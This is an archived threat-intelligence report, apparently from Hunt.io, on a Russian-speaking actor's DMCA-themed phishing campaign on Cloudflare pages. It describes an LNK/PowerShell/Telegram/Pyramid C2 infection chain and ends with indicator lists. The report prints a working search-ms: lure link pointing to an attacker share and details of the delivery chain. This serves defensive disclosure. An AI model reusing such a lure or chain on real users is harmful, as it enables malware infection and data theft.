{
	"id": "075d83cd-0403-4df8-84f0-7da7f4c66659",
	"created_at": "2026-04-06T00:08:49.385933Z",
	"updated_at": "2026-04-10T03:20:00.472008Z",
	"deleted_at": null,
	"sha1_hash": "d2c5fdfc8ed005186040e01d1fdfe0774abbbe84",
	"title": "Russian-Speaking Threat Actor Abuses Cloudflare \u0026 Telegram in Phishing Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 18729182,
	"plain_text": "Russian-Speaking Threat Actor Abuses Cloudflare \u0026 Telegram in\r\nPhishing Campaign\r\nPublished: 2025-04-01 · Archived: 2026-04-05 13:40:10 UTC\r\nTABLE OF CONTENTS\r\nDiscovery of Another Open DirectoryCloudflare Pages.Dev \u0026 Workers.Dev LuresFile AnalysisConclusion\r\nIn a follow-up to our previously reported activity involving phishing lures impersonating the Electronic Frontier\r\nFoundation, Hunt.io researchers have observed a new wave of attacks attributed to the same Russian-speaking threat\r\nactor. This recent campaign leverages Cloudflare-branded phishing pages themed around DMCA (Digital\r\nMillennium Copyright Act) takedown notices served across multiple domains.\r\nThe lure abuses the ms-search protocol to download a malicious LNK file disguised as a PDF via a double\r\nextension. Once executed, the malware checks in with an attacker-operated Telegram bot-sending the victim's IP\r\naddress-before transitioning to Pyramid C2 to control the infected host. This notable shift in tactics is likely due to\r\nincreased scrutiny following the public spotlight on their activity.\r\nThis update covers the phishing lures, infrastructure, and recurring OPSEC lapses-most notably, open directories\r\nthat continue to expose the actor's operations.\r\nDiscovery of Another Open Directory\r\nReaders may remember that in our March 4th post, we used AttackCapture™ to identify the open directory. This\r\ntime, we'll leverage the File Name feature to search for servers exposing files at the /documents/files/ path\r\ncovered previously.\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 1 of 10\n\nFigure 1: Hunt AttackCapture™ File Name search results for '/documents/files/'\r\nOn March 24th, Hunt scans identified a new server at 104.245.241[.]157 , which showed characteristics consistent\r\nwith infrastructure previously attributed to the actor. Hosted on the Railnet LLC network, the server exposed ports\r\n22, 80 (open directory), and 443. As we can see in the above screenshot, many of the file names were reused;\r\nhowever, the contents were changed.\r\nThrough additional scanning, we identified over 20 domains using the new open directory to download malicious\r\nfiles.\r\nCloudflare Pages.Dev \u0026 Workers.Dev Lures\r\nThe domains we observed all consisted of top-level domains of 'workers.dev' or 'pages.dev.' Cloudflare Pages allows\r\ndevelopers to deploy static websites directly from repositories, while Workers enables serverless JavaScript\r\nexecution. Both are commonly used for legitimate purposes but were abused to serve pages impersonating secure\r\ndocument sharing in this case.\r\nMost web pages referenced cgtrader[.]com, an online marketplace for 3D models. As we previously discussed, the\r\nactor likely targeted individuals from a specific community, this time with a DMCA takedown notice, possibly\r\nattempting to pressure users under the guise of copyright enforcement.\r\nA complete list of the domains we encountered can be found at the end of this post.\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 2 of 10\n\nFigure 2: Example phishing page.\r\nClicking the \"Get Document\" button initiates the download chain. The page displays a progress message intended to\r\nreinforce legitimacy:\r\n\"A Windows Explorer window will appear shortly. Click 'Open' and wait for the file to be retrieved from our secure server. P\r\n \r\nCopy\r\nReviewing the source code of the HTML reveals additional details about the infection chain.\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 3 of 10\n\nFigure 3: Snippet of the HTML source from https://devgrid-72kx[.]pages[.]dev.\r\nBeneath the interface, the site uses JavaScript to dynamically request a second-stage link from a Cloudflare Workers\r\nsubdomain ( https[:]//idufgljr[.]procansopa1987[.]workers[.]dev/get-link ). The response is a JSON\r\npayload containing a search-ms: protocol link:\r\n{\"link\":\"search-ms:query=references.pdf.\u0026crumb=location:%5C%5C213.209.150.191@80%5Cdocuments%5Cfiles\u0026displayname=Network\"}\r\nAfter URL decoding, this becomes:\r\nsearch-ms:query=references.pdf.\u0026crumb=location:\\\\213.209.150.191@80\\documents\\files\u0026displayname=Network\r\nThis opens a File Explorer window titled \"Network\" and performs a search for references.pdf. within the remote\r\nshare at \\\\213.209.150[.]191@80\\documents\\files . During dynamic analysis, we observed a decoy PDF opened\r\nin Microsoft Edge while the malicious LNK executes in the background, leading to infection without further user\r\ninteraction.\r\nThe use of search-ms: allows threat actors to proxy requests to malicious content through legitimate system\r\ninterfaces. While this technique is not new, it continues to evade detection in environments where protocol handlers\r\nlike search-ms: are not monitored or restricted.\r\nAs of publication time, we could not extract additional details about 213.209.150[.]191 , but the server plays a\r\nrole in the attackers' delivery infrastructure.\r\nFile Analysis\r\nThe core infection chain observed in this campaign mirrors earlier activity attributed to the same actor. Execution\r\nbegins with a Windows shortcut (.lnk) file masquerading as a PDF. When launched, the LNK executes a PowerShell\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 4 of 10\n\nscript to download a ZIP archive from the actor's malicious infrastructure. The archive contains a legitimate\r\npython.exe binary alongside a malicious Python script, which is executed to establish communication with Pyramid\r\nC2.\r\nWhile this delivery process remains consistent, several files within the open directory show incremental changes\r\nthat we will discuss below.\r\nFigure 4: Screenshot of the open directory at 104.245.241[.]157 in Hunt.\r\nkozlina2.ps1\r\nOut of all the files in the directory, kozlina2.ps1, a PowerShell loader responsible for initiating the second stage of\r\nthe infection chain, caught our eye. This script is executed by references.pdf.lnk, the initial shortcut file delivered\r\nvia the search-ms: lure.\r\nOnce executed, the script downloads a decoy PDF and ZIP archive from the open directory. The archive contains a\r\nlegitimate python.exe binary, multiple dependency files, and a Python-based loader. Upon extraction, a shortcut to\r\nthe Python script, which includes the Pyramid C2 config, is created and copied to the Windows startup folder to\r\nmaintain persistence across system reboots.\r\nWhere things differ is the integration of Telegram. kozlina2.ps1 uses a hardcoded Telegram bot token and chat ID to\r\nsend the external IP address of the infected host to the attacker using the Bot API. The IP is obtained via a call to the\r\nip-api[.]com service.\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 5 of 10\n\nFigure 5: Snippet of the PowerShell script, kozlina2.ps1.\r\nDue to the hardcoded credentials, we were able to pivot and gather limited details about the operators behind the\r\nchannel.\r\nThe group title is \" ПШ КОД ЗАПУСК \", which translates from Russian to \"PS CODE LAUNCH\"-a likely\r\nreference to the kozlina2 script. Using the API metadata, researchers were able to identify the following accounts\r\nconnected to the group:\r\n@tyyndrabot - The bot used to receive IP addresses from infected hosts.\r\n@pups2131 - The group's administrator.\r\nSkandi - A group member; their role remains unknown at this time.\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 6 of 10\n\nFigure 6: Screenshot from Telegram of the group tied to the malicious phishing attack.\r\nkursor.py\r\nThe ZIP archive retrieved by kozlina.ps1 also contains kursor.py , a Python script functionally consistent with\r\nprevious iterations covered in our earlier reporting. The script maintains the same role: decoding two configuration\r\nblocks that point to Pyramid C2 servers over port 443, including the previously identified 212.87.222[.]84 and\r\nthe open directory server at 104.245.241[.]157 .\r\nAlthough the overall logic remains the same, the actor introduced an additional obfuscation step to the configuration\r\ninformation. In earlier versions, the configuration was base64-encoded and zlib-compressed, making decoding\r\nstraightforward with tools like CyberChef.\r\nThe updated code now prepends five junk characters to the string before decoding begins. The reason for this is not\r\nimmediately evident to us, but decoding is the same as the junk string is stripped prior to decoding/decompressing.\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 7 of 10\n\nFigure 7: Screenshot of kursor.py showing the addition of junk characters to the configuration string.\r\nConclusion\r\nThis latest activity demonstrates the continued evolution of a previously reported Russian-speaking threat actor.\r\nWhile the overall delivery and malware execution processes remain the same, integrating Telegram-based IP\r\nreporting, additional obfuscation of Pyramid C2 configs, and using Cloudflare phishing lures reflect ongoing efforts\r\nto evade detection and frustrate analysis.\r\nThese incremental changes reinforce the importance of revisiting known tactics and infrastructure over time.\r\nDefenders should monitor for abuse of protocol handlers like search-ms: track open directories serving staged\r\npayloads, and remain alert to trusted services-such as Telegram and Cloudflare Workers-being used to mask early-stage activity.\r\nNetwork Observables and Indicators of Compromise (IOCs)\r\nIP Address Domain(s) ASN Notes\r\n104.245.241[.]157 N/A\r\nRailnet\r\nLLC\r\nOpen directory located at\r\n/documents/files/\r\n104.245.241[.]71 N/A\r\nRailnet\r\nLLC\r\nPyramid C2\r\n213.209.150[.]191 N/A\r\nRailnet\r\nLLC\r\nPart of search-ms link\r\nhosting malicious files\r\n172.67.176[.]118\r\n104.21.40[.]53\r\nidufgljr.procansopa1987[.]workers.dev Cloudflare Phishing pages ↓\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 8 of 10\n\nIP Address Domain(s) ASN Notes\r\n172.66.44[.]148\r\n172.66.47[.]108\r\ndmca-hub-r2ao.pages[.]dev Cloudflare\r\n172.66.44[.]162\r\n172.66.47[.]94\r\nrendernest-y4et.pages[.]dev Cloudflare\r\n172.66.45[.]9\r\n172.66.46[.]247\r\nrenderhub-5bam.pages[.]dev/james94.pdf Cloudflare\r\n172.66.44[.]95\r\n172.66.47[.]161\r\ndevcloud-5lpl.pages[.]dev/tibiscui16.pdf Cloudflare\r\n172.66.44[.]87\r\n172.66.47[.]169\r\ncloudforge-g9gi.pages[.]dev/jewelry-3d-maker.pdf\r\nCloudflare\r\n172.66.45[.]31\r\n172.66.46[.]225\r\nrenderbase-tp71.pages[.]dev Cloudflare\r\n172.66.44[.]215\r\n172.66.47[.]41\r\nrenderbase-27s7.pages[.]dev/keremcal.pdf Cloudflare\r\n172.66.44[.]166\r\n172.66.47[.]90\r\npolybase-6e8v.pages.dev Cloudflare\r\n104.21.112[.]1\r\n104.21.16[.]1\r\ndevhub-dn06.pages.dev Cloudflare\r\n172.66.44[.]94\r\n172.66.47[.]162\r\ncloudforge-p9cm.pages[.]dev Cloudflare\r\n172.66.44[.]176\r\n172.66.47[.]80\r\nrenderhub-30pd.pages.dev Cloudflare\r\n172.66.44[.]165\r\n172.66.47[.]91\r\ndevcore-2lef.pages[.]dev Cloudflare\r\n172.66.47[.]78\r\n172.66.44[.]178\r\nrendernest-54x9.pages[.]dev Cloudflare\r\n172.66.47[.]160\r\n172.66.44[.]96\r\n3dflow-85wo.pages[.]dev Cloudflare\r\n172.66.45[.]11\r\n172.66.46[.]245\r\ndevcloud-63gg.pages[.]dev Cloudflare\r\n172.66.47[.]165\r\n172.66.44[.]91\r\nrendernest-en88.pages[.]dev Cloudflare\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 9 of 10\n\nIP Address Domain(s) ASN Notes\r\n172.66.47[.]140\r\n172.66.44[.]116\r\n3dmeshhub-k35m.pages[.]dev Cloudflare\r\n172.66.44[.]57\r\n172.66.47[.]199\r\ndevgrid-1wsz.pages[.]dev Cloudflare\r\n172.66.44[.]159\r\n172.66.47[.]97\r\nmeshlinker-2imf.pages[.]dev Cloudflare\r\n172.66.47[.]189\r\n172.66.44[.]67\r\ndevcore-ec8q.pages[.]dev Cloudflare\r\n172.66.45[.]28\r\n172.66.46[.]228\r\ndevgrid-72kx.pages[.]dev Cloudflare\r\n172.66.47[.]148\r\n172.66.44[.]108\r\ncloud3d-k5sa.pages.dev Cloudflare\r\n172.66.46[.]230\r\n172.66.45[.]26\r\n3dlinker-gs9y.pages.dev Cloudflare\r\nHost Observables and Indicators of Compromise (IOCs)\r\nFilename SHA-256\r\nkozlina2.ps1 b542033864dd09b2cff6ddec7f19ac480ab79e742481a14ae345051d323f58e7\r\nreferences.pdf.lnk bf3b19c30085a9611650aa283856bf3defec894aae0b303ccf90244746127206\r\nterms-of-service.pdf.lnk 9103211fc44a4918591106e8bfa73c3d3cc1fa98512fa31aa87423f7a7c51825\r\nkursor.py be35ed6d513f06c1016a769ea6db7ee30a93b9a28ba39ecde832273833dc5b51\r\nKursorResources.lnk 3b45369da19e3c30e0baf15b3499d119cf812a0e6c2b37b64620340b27decbe3\r\nKursorResources.zip d9afee5fc0039d6428ca7bc8d5e309cafdcd905b8e4d8843e6d21a89e2b25630\r\nSource: https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2"
	],
	"report_names": [
		"russian-actor-cloudflare-phishing-telegram-c2"
	],
	"threat_actors": [],
	"ts_created_at": 1775434129,
	"ts_updated_at": 1775791200,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2c5fdfc8ed005186040e01d1fdfe0774abbbe84.pdf",
		"text": "https://archive.orkl.eu/d2c5fdfc8ed005186040e01d1fdfe0774abbbe84.txt",
		"img": "https://archive.orkl.eu/d2c5fdfc8ed005186040e01d1fdfe0774abbbe84.jpg"
	}
}